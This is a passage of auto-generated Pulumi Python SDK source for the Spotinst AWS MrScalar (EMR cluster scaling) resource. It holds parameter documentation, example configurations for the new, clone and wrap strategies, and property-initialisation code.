:param pulumi.Input[str] job_flow_role: The IAM role that was specified when the job flow was launched. The EC2 instances of the job flow assume this role.
:param pulumi.Input[bool] keep_job_flow_alive: Specifies whether the cluster should remain available after completing all steps.
:param pulumi.Input[str] log_uri: The path to the Amazon S3 location where logs for this cluster are stored.
:param pulumi.Input[str] managed_primary_security_group: EMR Managed Security group that will be set to the primary instance group.
:param pulumi.Input[str] managed_replica_security_group: EMR Managed Security group that will be set to the replica instance group.
:param pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['MrScalarMasterEbsBlockDeviceArgs']]]] master_ebs_block_devices: This determines the ebs configuration for your master group instances. Only a single block is allowed.
:param pulumi.Input[bool] master_ebs_optimized: EBS Optimization setting for instances in group.
:param pulumi.Input[Sequence[pulumi.Input[str]]] master_instance_types: The MrScaler instance types for the master nodes.
:param pulumi.Input[str] master_lifecycle: The MrScaler lifecycle for instances in master group. Allowed values are 'SPOT' and 'ON_DEMAND'.
:param pulumi.Input[int] master_target: Number of instances in the master group.
:param pulumi.Input[str] name: The application name.
:param pulumi.Input[str] region: The MrScaler region.
:param pulumi.Input[str] repo_upgrade_on_boot: Applies only when `custom_ami_id` is used. Specifies the type of updates that are applied from the Amazon Linux AMI package repositories when an instance boots using the AMI. Possible values include: `SECURITY`, `NONE`.
:param pulumi.Input[int] retries: Specifies the maximum number of times a capacity provisioning should be retried if the provisioning timeout is exceeded. Valid values: `1-5`.
:param pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['MrScalarScheduledTaskArgs']]]] scheduled_tasks: An array of scheduled tasks.
:param pulumi.Input[str] security_config: The name of the security configuration applied to the cluster.
:param pulumi.Input[str] service_access_security_group: The identifier of the Amazon EC2 security group for the Amazon EMR service to access clusters in VPC private subnets.
:param pulumi.Input[str] service_role: The IAM role that will be assumed by the Amazon EMR service to access AWS resources on your behalf.
:param pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['MrScalarStepsFileArgs']]]] steps_files: Steps from S3.
:param pulumi.Input[str] strategy: The MrScaler strategy. Allowed values are `new` `clone` and `wrap`.
:param pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['MrScalarTagArgs']]]] tags: A list of tags to assign to the resource. You may define multiple tags.
:param pulumi.Input[int] task_desired_capacity: amount of instances in task group.
:param pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['MrScalarTaskEbsBlockDeviceArgs']]]] task_ebs_block_devices: This determines the ebs configuration for your task group instances. Only a single block is allowed.
:param pulumi.Input[bool] task_ebs_optimized: EBS Optimization setting for instances in group.
:param pulumi.Input[Sequence[pulumi.Input[str]]] task_instance_types: The MrScaler instance types for the task nodes.
:param pulumi.Input[str] task_lifecycle: The MrScaler lifecycle for instances in task group. Allowed values are 'SPOT' and 'ON_DEMAND'.
:param pulumi.Input[int] task_max_size: maximal amount of instances in task group.
:param pulumi.Input[int] task_min_size: The minimal amount of instances in task group.
:param pulumi.Input[str] task_unit: Unit of task group for target, min and max. The unit could be `instance` or `weight`. instance - amount of instances. weight - amount of vCPU.
:param pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['MrScalarTerminationPolicyArgs']]]] termination_policies: Allows defining termination policies for EMR clusters based on CloudWatch Metrics.
:param pulumi.Input[bool] termination_protected: Specifies whether the Amazon EC2 instances in the cluster are protected from termination by API calls, user intervention, or in the event of a job-flow error.
"""
...
@overload
def __init__(__self__,
resource_name: str,
args: MrScalarArgs,
opts: Optional[pulumi.ResourceOptions] = None):
"""
Provides a Spotinst AWS MrScaler resource.
## Example Usage
### New Strategy
```python
import pulumi
import pulumi_spotinst as spotinst
sample__mr_scaler_01 = spotinst.aws.MrScalar("sample-MrScaler-01",
additional_info="{'test':'more information'}",
additional_primary_security_groups=["sg-456321"],
additional_replica_security_groups=["sg-123654"],
applications=[
spotinst.aws.MrScalarApplicationArgs(
name="Ganglia",
version="1.0",
),
spotinst.aws.MrScalarApplicationArgs(
name="Hadoop",
),
spotinst.aws.MrScalarApplicationArgs(
args=[
"fake",
"args",
],
name="Pig",
),
],
availability_zones=["us-west-2a:subnet-123456"],
bootstrap_actions_files=[spotinst.aws.MrScalarBootstrapActionsFileArgs(
bucket="sample-emr-test",
key="bootstrap-actions.json",
)],
configurations_files=[spotinst.aws.MrScalarConfigurationsFileArgs(
bucket="example-bucket",
key="configurations.json",
)],
core_desired_capacity=1,
core_ebs_block_devices=[spotinst.aws.MrScalarCoreEbsBlockDeviceArgs(
size_in_gb=40,
volume_type="gp2",
volumes_per_instance=2,
)],
core_ebs_optimized=False,
core_instance_types=[
"c3.xlarge",
"c4.xlarge",
],
core_lifecycle="ON_DEMAND",
core_max_size=1,
core_min_size=1,
core_unit="instance",
custom_ami_id="ami-123456",
description="Testing MrScaler creation",
ec2_key_name="test-key",
instance_weights=[
spotinst.aws.MrScalarInstanceWeightArgs(
instance_type="t2.small",
weighted_capacity=10,
),
spotinst.aws.MrScalarInstanceWeightArgs(
instance_type="t2.medium",
weighted_capacity=90,
),
],
job_flow_role="EMR_EC2_ExampleRole",
keep_job_flow_alive=True,
log_uri="s3://example-logs",
managed_primary_security_group="sg-123456",
managed_replica_security_group="sg-987654",
master_ebs_block_devices=[spotinst.aws.MrScalarMasterEbsBlockDeviceArgs(
size_in_gb=30,
volume_type="gp2",
volumes_per_instance=1,
)],
master_ebs_optimized=True,
master_instance_types=["c3.xlarge"],
master_lifecycle="SPOT",
master_target=1,
provisioning_timeout=spotinst.aws.MrScalarProvisioningTimeoutArgs(
timeout=15,
timeout_action="terminateAndRetry",
),
region="us-west-2",
release_label="emr-5.17.0",
repo_upgrade_on_boot="NONE",
retries=2,
security_config="example-config",
service_access_security_group="access-example",
service_role="example-role",
steps_files=[spotinst.aws.MrScalarStepsFileArgs(
bucket="example-bucket",
key="steps.json",
)],
strategy="new",
tags=[spotinst.aws.MrScalarTagArgs(
key="Creator",
value="Pulumi",
)],
task_desired_capacity=1,
task_ebs_block_devices=[spotinst.aws.MrScalarTaskEbsBlockDeviceArgs(
size_in_gb=40,
volume_type="gp2",
volumes_per_instance=2,
)],
task_ebs_optimized=False,
task_instance_types=[
"c3.xlarge",
"c4.xlarge",
],
task_lifecycle="SPOT",
task_max_size=30,
task_min_size=0,
task_unit="instance",
termination_protected=False)
```
### Clone Strategy
```python
import pulumi
import pulumi_spotinst as spotinst
sample__mr_scaler_01 = spotinst.aws.MrScalar("sample-MrScaler-01",
availability_zones=["us-west-2a:subnet-12345678"],
cluster_id="j-123456789",
core_desired_capacity=1,
core_ebs_block_devices=[spotinst.aws.MrScalarCoreEbsBlockDeviceArgs(
size_in_gb=40,
volume_type="gp2",
volumes_per_instance=2,
)],
core_ebs_optimized=False,
core_instance_types=[
"c3.xlarge",
"c4.xlarge",
],
core_lifecycle="ON_DEMAND",
core_max_size=1,
core_min_size=1,
core_unit="instance",
description="Testing MrScaler creation",
expose_cluster_id=True,
master_ebs_block_devices=[spotinst.aws.MrScalarMasterEbsBlockDeviceArgs(
size_in_gb=30,
volume_type="gp2",
volumes_per_instance=1,
)],
master_ebs_optimized=True,
master_instance_types=["c3.xlarge"],
master_lifecycle="SPOT",
master_target=1,
region="us-west-2",
strategy="clone",
tags=[spotinst.aws.MrScalarTagArgs(
key="Creator",
value="Pulumi",
)],
task_desired_capacity=1,
task_ebs_block_devices=[spotinst.aws.MrScalarTaskEbsBlockDeviceArgs(
size_in_gb=40,
volume_type="gp2",
volumes_per_instance=2,
)],
task_ebs_optimized=False,
task_instance_types=[
"c3.xlarge",
"c4.xlarge",
],
task_lifecycle="SPOT",
task_max_size=30,
task_min_size=0,
task_scaling_down_policies=[spotinst.aws.MrScalarTaskScalingDownPolicyArgs(
action_type="",
adjustment="1",
cooldown=60,
dimensions={
"name": "name-1",
"value": "value-1",
},
evaluation_periods=10,
max_target_capacity="1",
maximum="10",
metric_name="CPUUtilization",
minimum="0",
namespace="AWS/EC2",
operator="gt",
period=60,
policy_name="policy-name",
statistic="average",
target="5",
threshold=10,
unit="",
)],
task_unit="instance")
pulumi.export("mrscaler-name", sample__mr_scaler_01.name)
pulumi.export("mrscaler-created-cluster-id", sample__mr_scaler_01.output_cluster_id)
```
### Wrap Strategy
```python
import pulumi
import pulumi_spotinst as spotinst
example_scaler_2 = spotinst.aws.MrScalar("example-scaler-2",
cluster_id="j-27UVDEHXL4OQM",
description="created by Pulumi",
region="us-west-2",
strategy="wrap",
task_desired_capacity=2,
task_ebs_block_devices=[spotinst.aws.MrScalarTaskEbsBlockDeviceArgs(
size_in_gb=20,
volume_type="gp2",
volumes_per_instance=1,
)],
task_instance_types=[
"c3.xlarge",
"c4.xlarge",
],
task_lifecycle="SPOT",
task_max_size=4,
task_min_size=0,
task_unit="instance")
```
:param str resource_name: The name of the resource.
:param MrScalarArgs args: The arguments to use to populate this resource's properties.
:param pulumi.ResourceOptions opts: Options for the resource.
"""
...
def __init__(__self__, resource_name: str, *args, **kwargs):
resource_args, opts = _utilities.get_resource_args_opts(MrScalarArgs, pulumi.ResourceOptions, *args, **kwargs)
if resource_args is not None:
__self__._internal_init(resource_name, opts, **resource_args.__dict__)
else:
__self__._internal_init(resource_name, *args, **kwargs)
def _internal_init(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
additional_info: Optional[pulumi.Input[str]] = None,
additional_primary_security_groups: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
additional_replica_security_groups: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
applications: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['MrScalarApplicationArgs']]]]] = None,
availability_zones: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
bootstrap_actions_files: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['MrScalarBootstrapActionsFileArgs']]]]] = None,
cluster_id: Optional[pulumi.Input[str]] = None,
configurations_files: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['MrScalarConfigurationsFileArgs']]]]] = None,
core_desired_capacity: Optional[pulumi.Input[int]] = None,
core_ebs_block_devices: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['MrScalarCoreEbsBlockDeviceArgs']]]]] = None,
core_ebs_optimized: Optional[pulumi.Input[bool]] = None,
core_instance_types: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
core_lifecycle: Optional[pulumi.Input[str]] = None,
core_max_size: Optional[pulumi.Input[int]] = None,
core_min_size: Optional[pulumi.Input[int]] = None,
core_scaling_down_policies: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['MrScalarCoreScalingDownPolicyArgs']]]]] = None,
core_scaling_up_policies: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['MrScalarCoreScalingUpPolicyArgs']]]]] = None,
core_unit: Optional[pulumi.Input[str]] = None,
custom_ami_id: Optional[pulumi.Input[str]] = None,
description: Optional[pulumi.Input[str]] = None,
ebs_root_volume_size: Optional[pulumi.Input[int]] = None,
ec2_key_name: Optional[pulumi.Input[str]] = None,
expose_cluster_id: Optional[pulumi.Input[bool]] = None,
instance_weights: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['MrScalarInstanceWeightArgs']]]]] = None,
job_flow_role: Optional[pulumi.Input[str]] = None,
keep_job_flow_alive: Optional[pulumi.Input[bool]] = None,
log_uri: Optional[pulumi.Input[str]] = None,
managed_primary_security_group: Optional[pulumi.Input[str]] = None,
managed_replica_security_group: Optional[pulumi.Input[str]] = None,
master_ebs_block_devices: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['MrScalarMasterEbsBlockDeviceArgs']]]]] = None,
master_ebs_optimized: Optional[pulumi.Input[bool]] = None,
master_instance_types: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
master_lifecycle: Optional[pulumi.Input[str]] = None,
master_target: Optional[pulumi.Input[int]] = None,
name: Optional[pulumi.Input[str]] = None,
provisioning_timeout: Optional[pulumi.Input[pulumi.InputType['MrScalarProvisioningTimeoutArgs']]] = None,
region: Optional[pulumi.Input[str]] = None,
release_label: Optional[pulumi.Input[str]] = None,
repo_upgrade_on_boot: Optional[pulumi.Input[str]] = None,
retries: Optional[pulumi.Input[int]] = None,
scheduled_tasks: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['MrScalarScheduledTaskArgs']]]]] = None,
security_config: Optional[pulumi.Input[str]] = None,
service_access_security_group: Optional[pulumi.Input[str]] = None,
service_role: Optional[pulumi.Input[str]] = None,
steps_files: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['MrScalarStepsFileArgs']]]]] = None,
strategy: Optional[pulumi.Input[str]] = None,
tags: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['MrScalarTagArgs']]]]] = None,
task_desired_capacity: Optional[pulumi.Input[int]] = None,
task_ebs_block_devices: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['MrScalarTaskEbsBlockDeviceArgs']]]]] = None,
task_ebs_optimized: Optional[pulumi.Input[bool]] = None,
task_instance_types: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
task_lifecycle: Optional[pulumi.Input[str]] = None,
task_max_size: Optional[pulumi.Input[int]] = None,
task_min_size: Optional[pulumi.Input[int]] = None,
task_scaling_down_policies: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['MrScalarTaskScalingDownPolicyArgs']]]]] = None,
task_scaling_up_policies: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['MrScalarTaskScalingUpPolicyArgs']]]]] = None,
task_unit: Optional[pulumi.Input[str]] = None,
termination_policies: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['MrScalarTerminationPolicyArgs']]]]] = None,
termination_protected: Optional[pulumi.Input[bool]] = None,
visible_to_all_users: Optional[pulumi.Input[bool]] = None,
__props__=None):
if opts is None:
opts = pulumi.ResourceOptions()
if not isinstance(opts, pulumi.ResourceOptions):
raise TypeError('Expected resource options to be a ResourceOptions instance')
if opts.version is None:
opts.version = _utilities.get_version()
if opts.id is None:
if __props__ is not None:
raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')
__props__ = MrScalarArgs.__new__(MrScalarArgs)
__props__.__dict__["additional_info"] = additional_info
__props__.__dict__["additional_primary_security_groups"] = additional_primary_security_groups
__props__.__dict__["additional_replica_security_groups"] = additional_replica_security_groups
__props__.__dict__["applications"] = applications
__props__.__dict__["availability_zones"] = availability_zones
__props__.__dict__["bootstrap_actions_files"] = bootstrap_actions_files
__props__.__dict__["cluster_id"] = cluster_id
__props__.__dict__["configurations_files"] = configurations_files
__props__.__dict__["core_desired_capacity"] = core_desired_capacity
__props__.__dict__["core_ebs_block_devices"] = core_ebs_block_devices
__props__.__dict__["core_ebs_optimized"] = core_ebs_optimized
__props__.__dict__["core_instance_types"] = core_instance_types
__props__.__dict__["core_lifecycle"] = core_lifecycle
__props__.__dict__["core_max_size"] = core_max_size
__props__.__dict__["core_min_size"] = core_min_size
__props__.__dict__["core_scaling_down_policies"] = core_scaling_down_policies
__props__.__dict__["core_scaling_up_policies"] = core_scaling_up_policies
__props__.__dict__["core_unit"] = core_unit
__props__.__dict__["custom_ami_id"] = custom_ami_id
__props__.__dict__["description"] = description
__props__.__dict__["ebs_root_volume_size"] = ebs_root_volume_size
__props__.__dict__["ec2_key_name"] = ec2_key_name
__props__.__dict__["expose_cluster_id"] = expose_cluster_id
__props__.__dict__["instance_weights"] = instance_weights
__props__.__dict__["job_flow_role"] = job_flow_role
__props__.__dict__["keep_job_flow_alive"] = keep_job_flow_alive
__props__.__dict__["log_uri"] = log_uri
__props__.__dict__["managed_primary_security_group"] = managed_primary_security_group
__props__.__dict__["managed_replica_security_group"] = managed_replica_security_group
__props__.__dict__["master_ebs_block_devices"] = master_ebs_block_devices
__props__.__dict__["master_ebs_optimized"] = master_ebs_optimized
__props__.__dict__["master_instance_types"] = master_instance_types
__props__.__dict__["master_lifecycle"] = master_lifecycle
__props__.__dict__["master_target"] = master_target
__props__.__dict__["name"] = name
__props__.__dict__["provisioning_timeout"] = provisioning_timeout
__props__.__dict__["region"] = region
__props__.__dict__["release_label"] = release_label
__props__.__dict__["repo_upgrade_on_boot"] = repo_upgrade_on_boot
__props__.__dict__["retries"] = retries
__props__.__dict__["scheduled_tasks"] = scheduled_tasks
__props__.__dict__["security_config"] = security_config
__props__.__dict__["service_access_security_group"] = service_access_security_group
__props__.__dict__["service_role"] = service_role
__props__.__dict__["steps_files"] = steps_files
if strategy is None and not opts.urn:
raise TypeError("Missing required property 'strategy'")
__props__.__dict__["strategy"] = strategy
__props__.__dict__["tags"] = tags
__props__.__dict__["task_desired_capacity"] = task_desired_capacity
__props__.__dict__["task_ebs_block_devices"] = task_ebs_block_devices
__props__.__dict__["task_ebs_optimized"] = task_ebs_optimized
__props__.__dict__["task_instance_types"] = task_instance_types
__props__.__dict__["task_lifecycle"] = task_lifecycle
__props__.__dict__["task_max_size"] = task_max_size
__props__.__dict__["task_min_size"] = task_min_size
__props__.__dict__["task_scaling_down_policies"] = task_scaling_down_policies
__props__.__dict__["task_scaling_up_policies"] = task_scaling_up_policies
__props__.__dict__["task_unit"] = task_unit
__props__.__dict__["termination_policies"] = termination_policies
__props__.__dict__["termination_protected"] = termination_protected
if visible_to_all_users is not None and not opts.urn:
warnings.warn("""This field has been removed from our API and is no longer functional.""", DeprecationWarning)
pulumi.log.warn("""visible_to_all_users is deprecated: This field has been removed from our API and is no longer functional.""")
__props__.__dict__["visible_to_all_users"] = visible_to_all_users
__props__.__dict__["output_cluster_id"] = None
super(MrScalar, __self__).__init__(
'spotinst:aws/mrScalar:MrScalar',
resource_name,
__props__,
opts)
@staticmethod
def get(resource_name: str,
id: pulumi.Input[str],
opts: Optional[pulumi.ResourceOptions] = None,
additional_info: Optional[pulumi.Input[str]] = None,
additional_primary_security_groups: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
additional_replica_security_groups: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
applications: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['MrScalarApplicationArgs']]]]] = None,
availability_zones: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
bootstrap_actions_files: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['MrScalarBootstrapActionsFileArgs']]]]] = None,
cluster_id: Optional[pulumi.Input[str]] = None,
configurations_files: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['MrScalarConfigurationsFileArgs']]]]] = None,
core_desired_capacity: Optional[pulumi.Input[int]] = None,
core_ebs_block_devices: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['MrScalarCoreEbsBlockDeviceArgs']]]]] = None,
core_ebs_optimized: Optional[pulumi.Input[bool]] = None,
core_instance_types: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
core_lifecycle: Optional[pulumi.Input[str]] = None,
core_max_size: Optional[pulumi.Input[int]] = None,
core_min_size: Optional[pulumi.Input[int]] = None,
core_scaling_down_policies: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['MrScalarCoreScalingDownPolicyArgs']]]]] = None,
core_scaling_up_policies: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['MrScalarCoreScalingUpPolicyArgs']]]]] = None,
core_unit: Optional[pulumi.Input[str]] = None,
custom_ami_id: Optional[pulumi.Input[str]] = None,
description: Optional[pulumi.Input[str]] = None,
ebs_root_volume_size: Optional[pulumi.Input[int]] = None,
ec2_key_name: Optional[pulumi.Input[str]] = None,
expose_cluster_id: Optional[pulumi.Input[bool]] = None,
instance_weights: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['MrScalarInstanceWeightArgs']]]]] = None,
job_flow_role: Optional[pulumi.Input[str]] = None,
keep_job_flow_alive: Optional[pulumi.Input[bool]] = None,
log_uri: Optional[pulumi.Input[str]] = None,
managed_primary_security_group: Optional[pulumi.Input[str]] = None,
managed_replica_security_group: Optional[pulumi.Input[str]] = None,
master_ebs_block_devices: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['MrScalarMasterEbsBlockDeviceArgs']]]]] = None,
master_ebs_optimized: Optional[pulumi.Input[bool]] = None,
master_instance_types: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
master_lifecycle: Optional[pulumi.Input[str]] = None,
master_target: Optional[pulumi.Input[int]] = None,
name: Optional[pulumi.Input[str]] = None,
output_cluster_id: Optional[pulumi.Input[str]] = None,
provisioning_timeout: Optional[pulumi.Input[pulumi.InputType['MrScalarProvisioningTimeoutArgs']]] = None,
region: Optional[pulumi.Input[str]] = None,
release_label: Optional[pulumi.Input[str]] = None,
repo_upgrade_on_boot: Optional[pulumi.Input[str]] = None,
retries: Optional[pulumi.Input[int]] = None,
scheduled_tasks: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['MrScalarScheduledTaskArgs']]]]] = None,
security_config: Optional[pulumi.Input[str]] = None,
service_access_security_group: Optional[pulumi.Input[str]] = None,
service_role: Optional[pulumi.Input[str]] = None,
steps_files: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['MrScalarStepsFileArgs']]]]] = None,
strategy: Optional[pulumi.Input[str]] = None,
tags: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['MrScalarTagArgs']]]]] = None,
task_desired_capacity: Optional[pulumi.Input[int]] = None,
task_ebs_block_devices: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['MrScalarTaskEbsBlockDeviceArgs']]]]] = None,
task_ebs_optimized: Optional[pulumi.Input[bool]] = None,
task_instance_types: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
task_lifecycle: Optional[pulumi.Input[str]] = None,
task_max_size: Optional[pulumi.Input[int]] = None,
task_min_size: Optional[pulumi.Input[int]] = None,
task_scaling_down_policies: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['MrScalarTaskScalingDownPolicyArgs']]]]] = None,
task_scaling_up_policies: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['MrScalarTaskScalingUpPolicyArgs']]]]] = None,
task_unit: Optional[pulumi.Input[str]] = None,
termination_policies: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['MrScalarTerminationPolicyArgs']]]]] = None,
termination_protected: Optional[pulumi.Input[bool]] = None,
visible_to_all_users: Optional[pulumi.Input[bool]] = None) -> 'MrScalar':
"""
Get an existing MrScalar resource's state with the given name, id, and optional extra
properties used to qualify the lookup.
:param str resource_name: The unique name of the resulting resource.
:param pulumi.Input[str] id: The unique provider ID of the resource to lookup.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[str] additional_info: This is meta information about third-party applications that third-party vendors use for testing purposes.
:param pulumi.Input[Sequence[pulumi.Input[str]]] additional_primary_security_groups: A list of additional Amazon EC2 security group IDs for the master node.
:param pulumi.Input[Sequence[pulumi.Input[str]]] additional_replica_security_groups: A list of additional Amazon EC2 security group IDs for the core and task nodes.
:param pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['MrScalarApplicationArgs']]]] applications: A case-insensitive list of applications for Amazon EMR to install and configure when launching the cluster
:param pulumi.Input[Sequence[pulumi.Input[str]]] availability_zones: List of AZs and their subnet Ids. See example above for usage.
:param pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['MrScalarBootstrapActionsFileArgs']]]] bootstrap_actions_files: Describes path to S3 file containing description of bootstrap actions. [More Information](https://api.spotinst.com/elastigroup-for-aws/services-integrations/elastic-mapreduce/import-an-emr-cluster/advanced/)
:param pulumi.Input[str] cluster_id: The MrScaler cluster id.
:param pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['MrScalarConfigurationsFileArgs']]]] configurations_files: Describes path to S3 file containing description of configurations. [More Information](https://api.spotinst.com/elastigroup-for-aws/services-integrations/elastic-mapreduce/import-an-emr-cluster/advanced/)
:param pulumi.Input[int] core_desired_capacity: amount of instances in core group.
:param pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['MrScalarCoreEbsBlockDeviceArgs']]]] core_ebs_block_devices: This determines the ebs configuration for your core group instances. Only a single block is allowed.
:param pulumi.Input[bool] core_ebs_optimized: EBS Optimization setting for instances in group.
:param pulumi.Input[Sequence[pulumi.Input[str]]] core_instance_types: The MrScaler instance types for the core nodes.
:param pulumi.Input[str] core_lifecycle: The MrScaler lifecycle for instances in core group. Allowed values are 'SPOT' and 'ON_DEMAND'.
:param pulumi.Input[int] core_max_size: maximal amount of instances in core group.
:param pulumi.Input[int] core_min_size: The minimal amount of instances in core group.
:param pulumi.Input[str] core_unit: Unit of task group for target, min and max. The unit could be `instance` or `weight`. instance - amount of instances. weight - amount of vCPU.
:param pulumi.Input[str] custom_ami_id: The ID of a custom Amazon EBS-backed Linux AMI if the cluster uses a custom AMI.
:param pulumi.Input[str] description: The MrScaler description.
:param pulumi.Input[str] ec2_key_name: The name of an Amazon EC2 key pair that can be used to ssh to the master node.
:param pulumi.Input[bool] expose_cluster_id: Allow the `cluster_id` to set a provider output variable.
:param pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['MrScalarInstanceWeightArgs']]]] instance_weights: Describes the instance and weights. Check out [Elastigroup Weighted Instances](https://api.spotinst.com/elastigroup-for-aws/concepts/general-concepts/elastigroup-capacity-instances-or-weighted) for more info.
:param pulumi.Input[str] job_flow_role: The IAM role that was specified when the job flow was launched. The EC2 instances of the job flow assume this role.
:param pulumi.Input[bool] keep_job_flow_alive: Specifies whether the cluster should remain available after completing all steps.
:param pulumi.Input[str] log_uri: The path to the Amazon S3 location where logs for this cluster are stored.
:param pulumi.Input[str] managed_primary_security_group: EMR Managed Security group that will be set to the primary instance group.
:param pulumi.Input[str] managed_replica_security_group: EMR Managed Security group that will be set to the replica instance group.
:param pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['MrScalarMasterEbsBlockDeviceArgs']]]] master_ebs_block_devices: This determines the ebs configuration for your master group instances. Only a single block is allowed.
:param pulumi.Input[bool] master_ebs_optimized: EBS Optimization setting for instances in group.
:param pulumi.Input[Sequence[pulumi.Input[str]]] master_instance_types: The MrScaler instance types for the master nodes.
:param pulumi.Input[str] master_lifecycle: The MrScaler lifecycle for instances in master group. Allowed values are 'SPOT' and 'ON_DEMAND'.
:param pulumi.Input[int] master_target: Number of instances in the master group.
:param pulumi.Input[str] name: The application name.
:param pulumi.Input[str] region: The MrScaler region.
:param pulumi.Input[str] repo_upgrade_on_boot: Applies only when `custom_ami_id` is used. Specifies the type of updates that are applied from the Amazon Linux AMI package repositories when an instance boots using the AMI. Possible values include: `SECURITY`, `NONE`.
:param pulumi.Input[int] retries: Specifies the maximum number of times a capacity provisioning should be retried if the provisioning timeout is exceeded. Valid values: `1-5`.
:param pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['MrScalarScheduledTaskArgs']]]] scheduled_tasks: An array of scheduled tasks.
:param pulumi.Input[str] security_config: The name of the security configuration applied to the cluster.
:param pulumi.Input[str] service_access_security_group: The identifier of the Amazon EC2 security group for the Amazon EMR service to access clusters in VPC private subnets.
:param pulumi.Input[str] service_role: The IAM role that will be assumed by the Amazon EMR service to access AWS resources on your behalf.
:param pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['MrScalarStepsFileArgs']]]] steps_files: Steps from S3.
:param pulumi.Input[str] strategy: The MrScaler strategy. Allowed values are `new` `clone` and `wrap`.
:param pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['MrScalarTagArgs']]]] tags: A list of tags to assign to the resource. You may define multiple tags.
:param pulumi.Input[int] task_desired_capacity: amount of instances in task group.
:param pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['MrScalarTaskEbsBlockDeviceArgs']]]] task_ebs_block_devices: This determines the ebs configuration for your task group instances. Only a single block is allowed.
:param pulumi.Input[bool] task_ebs_optimized: EBS Optimization setting for instances in group.
:param pulumi.Input[Sequence[pulumi.Input[str]]] task_instance_types: The MrScaler instance types for the task nodes.
:param pulumi.Input[str] task_lifecycle: The MrScaler lifecycle for instances in task group. Allowed values are 'SPOT' and 'ON_DEMAND'.
:param pulumi.Input[int] task_max_size: maximal amount of instances in task group.
:param pulumi.Input[int] task_min_size: The minimal amount of instances in task group.
:param pulumi.Input[str] task_unit: Unit of task group for target, min and max. The unit could be `instance` or `weight`. instance - amount of instances. weight - amount of vCPU.
:param pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['MrScalarTerminationPolicyArgs']]]] termination_policies: Allows defining termination policies for EMR clusters based on CloudWatch Metrics.
:param pulumi.Input[bool] termination_protected: Specifies whether the Amazon EC2 instances in the cluster are protected from termination by API calls, user intervention, or in the event of a job-flow error.
"""
opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))
__props__ = _MrScalarState.__new__(_MrScalarState)
__props__.__dict__["additional_info"] = additional_info
__props__.__dict__["additional_primary_security_groups"] = additional_primary_security_groups
__props__.__dict__["additional_replica_security_groups"] = additional_replica_security_groups
__props__.__dict__["applications"] = applications
__props__.__dict__["availability_zones"] = availability_zones
__props__.__dict__["bootstrap_actions_files"] = bootstrap_actions_files
__props__.__dict__["cluster_id"] = cluster_id
__props__.__dict__["configurations_files"] = configurations_files
__props__.__dict__["core_desired_capacity"] = core_desired_capacity
__props__.__dict__["core_ebs_block_devices"] = core_ebs_block_devices
__props__.__dict__["core_ebs_optimized"] = core_ebs_optimized
__props__.__dict__["core_instance_types"] = core_instance_types
__props__.__dict__["core_lifecycle"] = core_lifecycle
__props__.__dict__["core_max_size"] = core_max_size
__props__.__dict__["core_min_size"] = core_min_size
